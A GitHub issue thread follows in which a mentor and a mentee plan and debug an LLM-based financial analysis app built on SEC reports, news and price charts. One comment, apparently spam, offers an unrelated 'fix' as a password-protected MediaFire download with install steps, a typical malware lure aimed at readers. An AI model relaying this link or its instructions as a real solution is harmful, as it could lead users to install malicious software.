### ISSUE TITLE
LFX Workspace: Create a Wasm-based LLM app for financial analysts [Term-3]

### ISSUE THREAD

**Issue by lazyperson1020** [WasmEdge/WasmEdge#3715]
### Project Title

Create a Wasm-based LLM app for financial analysts

### Motivation

The WasmEdge community has developed a decentralised computing infrastructure named Gaianet  where users can create and deploy customized AI agents as nodes. Each gaianet node can be fine-tuned with specific knowledge, allowing for personalized responses rather than generic AI outputs. In this project, we aim to develop a use case for analysis of the SEC (Securities Exchange Council) financial reports (like 10-K,10-Q) by an agent application. 

### Expected Outcome

- Develop a financial analysis agent app for SEC reports 
- Creation of public Gaia node with SEC knowledge base
- Implementation of LLM function call and database for document retrieval

### Details

We download the SEC reports and press releases and then store them in a database for data retrieval. An open-source LLM is used to generate summary and question-answer pairs on the documents for analysis and a knowledge base is prepared from it for deployment of public node. Further the agent app utilises the database/web and LLM function call is performed to generate answers for the users.

### Milestones

- [ ] **M1 [1 Week]**
  - Develop a script to download all SEC-published financial reports and related press releases from the web. 

- [ ] **M2 [2 Weeks]**
  - Store the documents in SQL database with the functionality to retrieve data by date ranges and/or stock symbols.

- [ ] **M3 [1 Week]**
  - Develop summaries and multiple QAs for each file using an open-source LLM on a public Gaia node. 

- [ ] **M4 [1.5 Weeks]**
  - Create a script to generate vector embeddings for each file from the summary / QA text.

- [ ] **M5 [1.5 Weeks]**
  - Create a public Gaianet node with the knowledge base. 

- [ ] **M6 [2 Weeks]**
  - Create an agent app that can take user query and generates the answer from the LLM. 
  - Implementation of LLM function calling to get the external data.

- [ ] **M7 [2 Weeks]**
  - Bug solving
  - Working on documentation
  - Weeks reserved for unexpected delays

### Appendix

  - [#3580](https://github.com/WasmEdge/WasmEdge/issues/3580)
  - [Gainanet](https://docs.gaianet.ai/intro/)

I plan to add and define more milestones as the project progresses.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by lazyperson1020** [comment]
Hi @juntao Do we plan to use external libraries to download the fillings like sec-edgar downloader , etc. Also, regarding the database for download of files, are we planning to host it on the cloud or somewhere. It would be of great help if you could possibly share some resources.

**Comment by juntao** [comment]
You can use any library (and programming language) to develop this script. 

Initially, the document database should run locally -- perhaps a local MySQL or SQLite server. I think we can easily connect to remote database servers later.

**Comment by lazyperson1020** [comment]
Dear @juntao , I tried making a script in python which could fetch the sec filings and save in SQL, but I wanted to know one thing. The libraries primarily download the filings as files (maybe text,pdf,html) on the disk first which can then be saved to sql database as binary large object file (BLOB). Do we need it this way or instead we directly save it to the database after parsing them and without saving on disk?
<img width="309" alt="Screenshot 2024-09-04 at 7 33 26 AM" src="https://github.com/user-attachments/assets/ecd9332d-48fd-4ab1-a6af-a26e4691d999">

**Comment by lazyperson1020** [comment]
Hi @juntao I have written [this](https://github.com/lazyperson1020/LFX-Updates/blob/main/Adding-to-mysql.py) script to download the SEC filings in the MySQL database and [this](https://github.com/lazyperson1020/LFX-Updates/blob/main/Parsing.py) to parse it using LLAMA-PARSE and save the parsed text (from markdown) in a new column.
<img width="1047" alt="Screenshot 2024-09-17 at 7 52 52 AM" src="https://github.com/user-attachments/assets/a3d82b37-4e6f-4346-919a-4a2d6b4233b9">
Please add necessary database connection values and llama-parse key to try it.

**Comment by juntao** [comment]
Cool. Can you provide docs on how to run this? I mean what files I need to edit, what are the meaning of variables I need to change, and how to run it. Thanks.

**Comment by lazyperson1020** [comment]
Are you able to run it? Can you please guide on the next steps.

**Comment by juntao** [comment]
Never wait for me. According to the plan, the next step is to build the SQL database for the application to search for the latest reports.

You will need to develop and test a special prompt that asks an LLM to extract all stock symbols from a paragraph of user question or comments. For example, if the user mentions Nvidia and Apple, it should respond with NVDA and AAPL. You can use a standard llama 3.1 model or a llama-3-groq tool call model for this.

https://docs.gaianet.ai/user-guide/nodes

**Comment by lazyperson1020** [comment]
I was testing some prompts in this [Colab](https://colab.research.google.com/drive/1At17gjDWTl248rstPW82kOAc0wMKTfKY?usp=sharing). I tried for some of the LLMs on GAIA and most of them gave long answers. I think using multiple LLMs can help us extract the exact stock symbols.

**Comment by lazyperson1020** [comment]
I was testing some prompts in this [Colab](https://colab.research.google.com/drive/1At17gjDWTl248rstPW82kOAc0wMKTfKY?usp=sharing). I tried for some of the LLMs on GAIA and most of them gave long answers. I think using multiple LLMs / asking multiple times can help us extract the exact stock symbols.

Also I have implemented tool calling feature for creating the tasks in this [script](https://github.com/lazyperson1020/LFX-Updates/blob/main/Tool_calling.py). 

For the question-answer pairs and summary, do we add them in the database itself or keep them separately for just the knowledge base?

**Comment by lazyperson1020** [comment]
1. I am getting time-out error while I was trying to create summaries from the markdown. Is there any solution for this?<img width="435" alt="Screenshot 2024-09-29 at 5 27 50 AM" src="https://github.com/user-attachments/assets/8d6b24c4-831d-412e-b7b1-93379789e783">


2. The approach I am using for generating embeddings from summary and ques-ans pairs is using CSV embed. It is fine or do I use some other way for better results?

**Comment by juntao** [comment]
I think you need to write the client side project so that it blocks until one request finishes before starting the next request. 

You cannot run multiple requests in parallel (eg async api calls) since the server only has one GPU.

**Comment by lazyperson1020** [comment]
1. Sir I got the error `500 Internal Server Error: Failed to get chat completions. Reason: The number of prompt tokens is greater than the context size: 232682 > 81920` while I was trying to generate summaries.  Even though the prompt tokens for llama is 8000 it is showing 81920 due to some inconsistencies. I have rectified it by making chunks after token counting (to lie within 8000) and then generate summary one by one 

2. After parsing the html, there are some areas in markdown where we have gibberish text. How do I clean this before summarisation?
<img width="670" alt="Screenshot 2024-10-01 at 7 43 36 AM" src="https://github.com/user-attachments/assets/a73575cc-8756-4db7-bfac-9759fdd72d52">

**Comment by juntao** [comment]
The llama node you are using have 80k context length. So, it is correct to say 81920. You are using it to generate QA for your chunk? That means the chunk is too big. You will need to sub-divide it.

**Comment by juntao** [comment]
Most RAG systems require chunks no greater than 300 tokens. We relaxed it to 81920 tokens -- that is 300x increase. But you are sending text much longer than that.

**Comment by lazyperson1020** [comment]
But if I send greater than 8000 then I get time-out error again and again. How will I get the appropriate chunk size to not get time-out error while even being within the bounds of 80k.

**Comment by juntao** [comment]
I think you need to 

1 use small chunks 

2 Slow down the requests -- make each request blocking and wait for 5 seconds after each request before sending next one. 

It could take 10+ hours to run through a large document.

**Comment by juntao** [comment]
If the time-out problem persists, we could start a new api server just for this. But before we do that, I think we need to try simple things. 

You could also pause your program for 5 minutes when you see a time-out and then retry.

**Comment by lazyperson1020** [comment]
Okay sir I was thinking of that but thought that longer times would be inconvenient  . What about the gibberish text part?

**Comment by juntao** [comment]
Shorter input would not produce gibberish. If your input is close to its context length, it tends to degrade.

**Comment by lazyperson1020** [comment]
Sir I was getting gibberish text in some parts of markdown which was parsed via LlamaParse.

**Comment by juntao** [comment]
Oh. Then it is a LlamaParse problem. :( Which backend LLM are you using with LlamaParse?

**Comment by lazyperson1020** [comment]
I dont know the backend since I am just using the free API. Might be llama I guess. You can view the parsed [markdown](https://github.com/lazyperson1020/LFX-Updates/blob/main/test/output.md) for Apple 10k.

https://docs.cloud.llamaindex.ai/llamaparse/getting_started

**Comment by juntao** [comment]
Perhaps try

https://www.firecrawl.dev

Or

https://www.eyelevel.ai/product/apis

**Comment by juntao** [comment]
Hi @lazyperson1020 

I have been thinking about this project. Many people told me that when they search for financial information:

1 They are only concerned about now. Historical data is interesting but not useful. 

2 They know exactly which company / ticker symbol that they'd like to learn more. 

So, semantic search on past financial reports is probably not going to be useful. Given that, I'd like to make some changes to our approach. 

1 We should focus on a SQL database that stores the latest financial statements. It is indexed by the stock symbol. We will use our tool to collect the financial reports, turn them into text, and save them in the database. 

2 Let's build a web UI that allows the user to enter a stock symbol. It will create a page that has:

* A real time price chart 
* Several news items about the stock
* A summary / interpretation of the news using the latest financial statement as the context


3 If the user enters a question about the stock symbol, it will use news + latest financial statement as the context to answer it. 

What do you think? Here is an example we could learn from: https://github.com/bklieger-groq/stockbot-on-groq

**Comment by lazyperson1020** [comment]
Hi @juntao I totally agree with your ideas. I wanted to ask whether are we still planning to create a knowledge base / public node or just the sql database? Do you want this to be like a separate app which a user clones and then locally keeps on running as required (just that it uses gaianet llms for stuff). Also do share some docs and resources if possible. 
Best Regards.

**Comment by juntao** [comment]
Hi @lazyperson1020 

I think we should pivot a little and focus working on the application (web UI, SQL query, web search etc). That means to use Gaia nodes as backend LLMs (you can also experiment on OpenAI). We can stop working on the vector knowledge base for the time being.

You can create your own SQL database server or create a free one here:

https://tidbcloud.com/

If you need a bigger model as a backend, you can also try this public gaia mode running Qwen 2.5 72B:

https://qwen72b.us.gaianet.network/v1/models

cheers
Michael

**Comment by lazyperson1020** [comment]
Dear @juntao I have some questions 
1. Since i have written scripts in python, I am using Django for creating the frontend unlike the [stockbot-on-groq](https://github.com/bklieger-groq/stockbot-on-groq) and the [gaianet chat-bot ui](https://github.com/GaiaNet-AI/chatbot-ui) which are written in react with typescript. Do I proceed with it? (we can use react also but it becomes cumbersome)
2.  For generating the output, a vector search must be performed on the embeddings of the news+financial report which means we need to update it continuously/ automatically after addition of each new report for given chat. How can I implement this?
3. Although the [stockbot-on-groq](https://github.com/bklieger-groq/stockbot-on-groq) provides various features, it doesn't let the users to leverage the outputs from these features. Like if I tell it to use the stock data for price prediction, it can't do that. (might be due to the limitations of the LLMs which can't do that). Do we also wish to perform elementary analysis of the various charts and stock data by providing that also in the context? Otherwise we can just use the news, sec report for answers and show real time price data for the stocks being asked in a chat on the app.
![png](https://github.com/user-attachments/assets/bc0aca1e-caee-43b3-adae-ddc0c8a89da1)

**Comment by juntao** [comment]
Re 1: The stockbot_on_Groq is just a reference. I do not mean to fork from it. We should see how it calls various financial data / chart APIs and write ours in a stack that we can maintain. 

Re 2: I thought we are going to put the latest financial reports (extracted text only) into a SQL database and query based on time and stock symbol? The query result is inserted into LLM context. Where is the vector database? ;)

We do need a script to download / convert / store the latest financial reports on a daily basis though. 

Re 3: Yes, we do want it to give a prediction. That can be done by prompting the LLM -- in the context we have the financial report + news + a set of rules on how to predict prices based on that report. 

The stackbot_on_groq provides nice UI (charts, news) that engages the human user.

**Comment by lazyperson1020** [comment]
Yeah but for the LLM to answer a question we must generate embeddings right?(like in RAG).  The frequency of updating this would affect the answers.
 There are popular libraries like yfinance which give multiple features like news and real time stock data based on tickers. But people generally use ML / DL techniques to make rules for further analysis after fetching data from yfinance.

**Comment by lazyperson1020** [comment]
It may happen that we update the SQL database only when there is a new SEC report published/added on the site. The news must be latest anyways.

**Comment by juntao** [comment]
We do not need embeddings for the LLM to answer. We can put both reports (updated periodically) and news (live search based on user query) into the system-prompt, and then just ask the LLM. 

The embeddings on RAG is for searching. It's purpose is to help us find the right report. After that, we still put the report text (not the embedding) into the LLM system-prompt.

**Comment by lazyperson1020** [comment]
So aren't there any limits on the amount of text we send as system-prompt. I thought embeddings might be useful in such a way to extract the relevant portions and then send that only as context.

**Comment by juntao** [comment]
Traditionally, people use vector search to find small chunks of text to add to the prompt. But

1 The LLM context window has grown significantly, Llama 3.1 allows for 128k context size -- which is longer than an entire book. IT can accomodate 100 pages of financial reports with no problem now.

2 The vector search generated small chunks of text, which are really bad for documents that have a lot of internal logical structure. That is the case for financial docs.

So, our originally approach was to generate QnA for financial reports so that they can be easily searched. But we will put the entire report into the prompt.

Now that we are changing the search to keyword search in SQL, we have no use of the embedding / vector database at all.

**Comment by lazyperson1020** [comment]
Thanks for clarity sir. Unfortunately the sec-reports that are downloaded are exceeding the 128k context size :(

> 1. 500 Internal Server Error: Failed to get chat completions. Reason: The number of prompt tokens is greater than the context size: 232682 > 81920

What if someone asks a question which requires the use of more than one report?

I think I need to cut down to the important parts of the reports only to fit into the context size. What do you think?

**Comment by juntao** [comment]
Thats actually not a problem either. Google already have 1M context size in production. It will soon be 10M context size by the end of the year. Open source is catching up fast too -- recall that Llama 3 only has 8k context size, and 3.1 is already at 128k.  Optimizations that are geared toward context size will be obsolete very soon if not already. 

For now, however, we can ask the LLM to generate a "summary" of each report before putting them into the LLM. We need to prompt it correctly, but the summary could be 20 pages of the main facts and numbers.

**Comment by lazyperson1020** [comment]
Hey @juntao 
1. I was testing the bot with some reports and it showed unexpected results like below ( for one or two, rest were fine)
<img width="780" alt="Screenshot 2024-10-12 at 8 04 51 PM" src="https://github.com/user-attachments/assets/779ed907-eaa5-42c2-9e87-8096dbd87a96">

2. I am using tool call to provide the relevant reports as prompt of the llm, fetch news and charts and update them based upon the user query. Do we also need that to add files in the database? ( Since there are lot of steps like downloading, parsing, cleaning , summarising and then adding it to prompt, it would take huge amount of time for responding for larger files)

**Comment by juntao** [comment]
I think we should minimize the use of tool calls -- for the reasons you notes -- and also tool calls can be unreliable.

If we already detect a stock symbol in the user query, we should 

* Get the latest SEC report for this symbol
* Search for related news and charts

all BEFORE the LLM query. We will put all those into the system prompt of the LLM query. 

There is no need for the LLM to tell the client to perform those tasks.

**Comment by juntao** [comment]
Here is another thing you could try if you have time ...

https://huggingface.co/second-state/FinGPT-MT-Llama-3-8B-LoRA-GGUF

Here is how to instruct and prompt the model to detect market sentiments. 

https://huggingface.co/FinGPT/fingpt-mt_llama3-8b_lora

**Comment by lazyperson1020** [comment]
Hey @juntao  I had a suggestion, like can we provide a table/form besides the chatbot where the user can -> see the status of the database, check what files are present in the database based on his query, select (one or more ) appropriate files he wishes to send to the prompt. This way the user **gets more hold** on what is inside the prompt. In that we can also provide interface to add a filing if it isn't present in the database. What are your thoughts on this?

**Comment by juntao** [comment]
I believe our current design is to have a gaia node WITHOUT a knowledge base. The client app assembles the entire prompt with the latest financial report + an aggregation of news summaries.

What are the additional files the user can select to include in the prompt?

**Comment by lazyperson1020** [comment]
Yeah we don't want a knowledge base, we just want to provide an interface (in the app) for the user to perform CRUD operations in the database and keep track of what is exactly being fed into the prompt based on his choice(like which SEC files are sent as prompt). Fine?

**Comment by lazyperson1020** [comment]
Just as Cursor AI IDE, we can provide the user the ultimate power to select the 'context' for asking questions rather than just automatically adding files based on his query.

**Comment by juntao** [comment]
Okay. What are the files the user can select? Past SEC reports?

**Comment by lazyperson1020** [comment]
Other than SEC reports, the user can be asked if he wishes to further analyse the OHLC data for the market ( for specified periods) and provide more data into the prompt [from trading view widgets]. But to do that, we must first ask the user and give him a sneak into the data and pass it only if he wishes.

**Comment by lazyperson1020** [comment]
> When do you think you will have a version that can demo? Thanks.

I will provide a demo next week. Is that fine?

**Comment by juntao** [comment]
Next week is great. Thank you!

**Comment by juntao** [comment]
Check out this

https://x.com/aravsrinivas/status/1846289701822677441

**Comment by lazyperson1020** [comment]
Dear Sir,
I would like you to [check this out](https://www.youtube.com/watch?v=e0Uj4yWdaAg). Using mullti- ai agents we can create a RAG app comparable to the perplexity example. Otherwise we could you this - https://cookbook.openai.com/examples/structured_outputs_multi_agent . Our current approach which is devoid of this won't stand out.

**Comment by juntao** [comment]
My apologies for the delay. Yeah, the CrewAI demo is cool. Can you replicate their work but switch the backend from OpenAI to a Gaia node?

If that is successful, we need to add a web UI to it.

I saw that they have RAG search in the workflow. We should try to improve that. I do not like the idea of breaking up financial documents into small pieces. So, perhaps we should just do a SQL search on the latest reports and put the comprehensive summary (from another LLM) into the agent context.

**Comment by lazyperson1020** [comment]
https://github.com/user-attachments/assets/55a031a5-e4fc-4262-b6a7-d5847cc6a139

I have made a demonstration for the current version. It is bit buggy and need some refactoring. 
In the above , I used gpt-4o api as the llama node was giving gibberish answers

**Comment by lazyperson1020** [comment]
https://github.com/user-attachments/assets/a88f9d2e-627f-47d5-8f27-bf80bc97f337

How about this? 
I will fix some bugs and upload the code.

**Comment by juntao** [comment]
This looks great. Thank you.

One thing I would like to do is to start with a standard HTML form input. We should just have a "search box" where the user must enter a stock symbol or company name. It will respond with the price chart + report summary + news. After that, the user can ask follow up questions in the chat ui.

For the initial search box, I think we should allow for any natural description of the company he wants to search. For example, maybe "Elon Musk's car company" will map to the TSLA stock symbol. I am thinking that maybe perform a search and let the LLM figure out the stock symbol based on the search results.

https://www.google.com/search?q=%22elon+musk%27s+car+company%22+stock+ticker+symbol

Then, in the follow up conversation, we should have report summary + latest stock price + news in the "system prompt". 

Bonus feature: We could setup a Gaia node with "knowledge" on financial terms (e.g., what is a P/E ratio?). This knowledge could be a public text book or QA set, and we can create a vector DB from it for the node.

**Comment by lazyperson1020** [comment]
> For the initial search box, I think we should allow for any natural description of the company he wants to search. For example, maybe "Elon Musk's car company" will map to the TSLA stock symbol. I am thinking that maybe perform a search and let the LLM figure out the stock symbol based on the search results.

For this initial search , do we perform a google search?  If we want to inject latest data which is beyond the knowledge of the llm then this would help us find the stock symbol even for some new company.

**Comment by lazyperson1020** [comment]
My current approach uses a tool call to fetch the ticker according to query and then it proceeds with transferring the (news+report summary+price chart) in the prompt and then answering questions until the I fetch a different ticker in the query. So if I want to put search operation for some natural description, then maybe we could use one more api call to first analyse the query and then predict some ticker. If the tool call is successful for that, then we can proceed via the above strategy.

**Comment by juntao** [comment]
Which model did you use to generate the tool call? My experience with tool call is that they are not very reliable.

I think asking the user to start by entering a stock symbol would be a faster and better experience.

**Comment by lazyperson1020** [comment]
> I think asking the user to start by entering a stock symbol would be a faster and better experience.

If we directly start by entering a symbol then do we really need a natural description? I used llamatool gaia node for tool calling and it was working fine mostly.

**Comment by lazyperson1020** [comment]
I could not find a better way to identify stock symbols in the query. It may happen that we provide a list before hand of all the stock symbols in the market and then identify using it.

**Comment by juntao** [comment]
Perhaps we can simply provide a list of popular symbols on the UI for the users to click on and select. 

This is the first time the user interact with our app, and we want it to be very reliable.

**Comment by lazyperson1020** [comment]
Then sir what about the natural description of the company? I mean if the user provides the symbol then we dont need to map to the symbol right

**Comment by juntao** [comment]
Yeah. I think for the initial MVP, we can ask for the symbol and focus on providing good information and engagement after we have the symbol. 

We can improve symbol lookup using NL later.

**Comment by lazyperson1020** [comment]
Hi sir, please try the initial version [here](https://github.com/lazyperson1020/LFX-Updates/tree/main)

**Comment by lazyperson1020** [comment]
https://github.com/lazyperson1020/LFX-Updates 
Hey sir, please check this out and let me know the suggestions if any. Also tell me if you face any problem while using it.

**Comment by juntao** [comment]
Can you make a single command to start both the database manager and chatbot? For example, the chatbot could be started on port 8080 and the database manager could be started on port 8081. Also, please read the parameters (e.g., database connection, LLM API endpoint, llamaparse API key etc.) from env vars or from the command line args. This way, I can run the entire app inside a Docker container.

Also, I thought the app need to search and summarize latest news. You do not need an API key for a search service?

**Comment by lazyperson1020** [comment]
I have used yfinance for searching the latest news. The problem is that they are protected content and sometimes can be scraped. Which service do you want me to use instead?

**Comment by juntao** [comment]
Hmm, I thought we are using yfinance for charts and data etc. And we can use a real search engine API, such as Tavily, Duckduckgo and Bing, to collect the news.

But, lets try your current version first. Let me know when you have a server version that I can run in Docker. Thanks.

**Comment by lazyperson1020** [comment]
Sir please check if it is fine now.

**Comment by lazyperson1020** [comment]
I think we need to scrape the news results to generate the summary. Tavily doesnt provide the scraped content I guess.

**Comment by lazyperson1020** [comment]
Any updates sir??

**Comment by juntao** [comment]
Sorry for the delay. Can you provide a Dockerfile or a Docker image that I can simply run with a 

docker run

command? You can map the necessary ports to the host and pass arguments (eg api keys) on the docker command line. 

Example: https://github.com/GaiaNet-AI/gaianet-node/tree/main/docker

Thanks!

**Comment by lazyperson1020** [comment]
Sir check now & tell if you face any problems

**Comment by juntao** [comment]
Cool! It works.

<img width="1546" alt="Screenshot 2024-11-09 at 11 59 09 PM" src="https://github.com/user-attachments/assets/af0fd9d7-04d6-4627-a21f-cc03cfb3e463">

However, it fails to fetch the latest SEC report ...

<img width="308" alt="Screenshot 2024-11-10 at 12 17 16 AM" src="https://github.com/user-attachments/assets/502b5835-4849-4de5-8801-82cb07dbe448">

and it fails to fetch some news content. Are those news from Y! Finance?

<img width="305" alt="Screenshot 2024-11-10 at 12 17 50 AM" src="https://github.com/user-attachments/assets/59c2ae2a-0ace-43d5-9ad9-540e7055d219">

Also, the 8502 server is not running.

<img width="772" alt="Screenshot 2024-11-09 at 11 58 26 PM" src="https://github.com/user-attachments/assets/117091a8-3455-45d2-a2ec-645e74d75d11">

About the UI: 

PC Desktop: Can we make the search panel as the main panel (2/3 of the screen width)? The chat panel could be 1/3 of the screen.

Mobile: It now defaults to the chat panel. I think it should default to the search panel.

Also, can we remove the "deploy" button at the top right? Thanks.

**Comment by juntao** [comment]
Also, I would like the user to enter anything in the search box, and it would suggest symbols in a dropdown menu for the user to select. For example, the user could enter Tesla automobile and the dropdown would be TSLA.

Finally, can we support crypto symbols such as

* BTC
* ETH
* SOL
* BNB
* DOGE
* XRP
* ADA
* TRX
* BCH
* DOT
* POL
* LTC
* NEAR
* UNI

They would not have SEC reports. Just latest charts and news. But you cannot find them on Yahoo Finance. You could try the following

* https://www.tradingview.com/symbols/ETHUSD/
* https://coinmarketcap.com/currencies/ethereum/
* https://www.coingecko.com/en/coins/ethereum

**Comment by lazyperson1020** [comment]
> Also, the 8502 server is not running.

This may happen due to wrong database connection parameters

**Comment by juntao** [comment]
Oh, right. Do you have a SQL script that I need to run to initialize the database? (i.e., create tables etc)

**Comment by lazyperson1020** [comment]
Sir you just need to set the connection values ( try it on local sql server ) and just put the name of your choice for DB_Name variable.

**Comment by juntao** [comment]
I think the best way to map natural language to stock symbol is to use an LLM. The system prompt should contain a list of stock symbols and its associated description. Then, we ask the LLM to map the user input to a most like stock symbol on that list.

**Comment by lazyperson1020** [comment]
Dear Sir, please excuse me for a slight delay. I will update in some time.

**Comment by lazyperson1020** [comment]
Sir do I need to provide documentation/demonstration also?

**Comment by juntao** [comment]
I think your repo should suffice. Maybe change it to a different name -- e.g., `financial-research-agent` and then transfer the repo to the LlamaEdge or WasmEdge repo.

But, I would like to see two features we described:

1 Suggest stock symbols (maybe in a drop-down menu) based on natural language description.

2 Support crypto symbols (BTC, ETH, SOL, etc)

**Comment by lazyperson1020** [comment]
Sir please test the app. I have added features.

**Comment by lazyperson1020** [comment]
There are some issues in fetching the news from yfinance. I was thinking of completely removing that and just use tavily for news. I want to refactor some of the code and provide you with the final repo. Please check if there are any UI related issues.

**Comment by juntao** [comment]
Yes, we can use tavily and remove yfinance if that works better.

Also, we need to contribute this repo to the WasmEdge project. I forked the Github_analyser repo at

https://github.com/LlamaEdge/stock-analyst

Can you delete your upstream repo and then make the further changes in the new repo through PRs? Thanks.

**Comment by juntao** [comment]
The issue with not finding any SEC filings is still not resolved ... I can confirm that the database is setup properly.

<img width="527" alt="Screenshot 2024-12-02 at 3 54 15 AM" src="https://github.com/user-attachments/assets/42918a9d-2e07-4f9a-9515-9569fd5ac238">
<img width="524" alt="Screenshot 2024-12-02 at 3 53 57 AM" src="https://github.com/user-attachments/assets/e980dc32-3d01-438f-a483-980bfcf1a422">

In addition, some UI issues:

* Can we move the chart to the right panel? It could be fixed at the top right and the chat session will be at the lower right panel.
* When I change the stock symbol at the top, the old news from the previous search should be immediately cleared.

**Comment by lazyperson1020** [comment]
For getting the filings you must download them from the database manager.

**Comment by lazyperson1020** [comment]
Also do you want me to remove the load news button (and always load the news) or just have the functionality of news being cleared once new ticker is written.

**Comment by juntao** [comment]
Can you make a screen recording of how to do this? I tried to download but could not see it after I downloaded it. Do I need to generate a summary for each downloaded file?

I think we could ideally make this an operation I can perform on a command line (maybe a web service call via curl) -- since we need a cron job to do this regularly instead of manually.

**Comment by juntao** [comment]
> Also do you want me to remove the load news button (and always load the news) or just have the functionality of news being cleared once new ticker is written.

Automatically loading the news would be great. But we can still have that button and rename it to "Refresh the news" for users to update the news list if needed.

**Comment by lazyperson1020** [comment]
Could you share the screenshot of the second app (data manager) when you ran it? It must show a table of the database

**Comment by juntao** [comment]
Mine does not show that data row. I did click on the button to load reports and it returned success. 

> Could you share the screenshot of the second app (data manager) when you ran it? It must show a table of the database.
> 
> <img width="1440" alt="Screenshot 2024-12-02 at 3 59 07 PM" src="https://github.com/user-attachments/assets/29881f05-2135-4ff7-ba25-6d6fef4adb8b">
>

**Comment by juntao** [comment]
Mine looks this. And I can see the tables your script created in the database -- so I know the database connection is good.

<img width="1610" alt="Screenshot 2024-12-03 at 2 54 26 AM" src="https://github.com/user-attachments/assets/fa3a3c14-f11f-498e-8966-948f52aef7c3">
<img width="1606" alt="Screenshot 2024-12-03 at 2 55 39 AM" src="https://github.com/user-attachments/assets/c0603ef4-c433-460b-80cf-d450e481d29b">

**Comment by juntao** [comment]
But regardless, I do not think we should manage the download process in the UI. Instead, we should provide a single URL, perhaps

http://host:8502/download_filings?symbol=TSLA

And it will download the latest reports (unless it is already downloaded), parse text, generate summary, save to DB etc. -- that is to do everything the user is supported to do in the UI. THanks.

**Comment by hydai** [comment]
Hi @juntao and @lazyperson1020 
Just want to check if this issue is resolved or not.
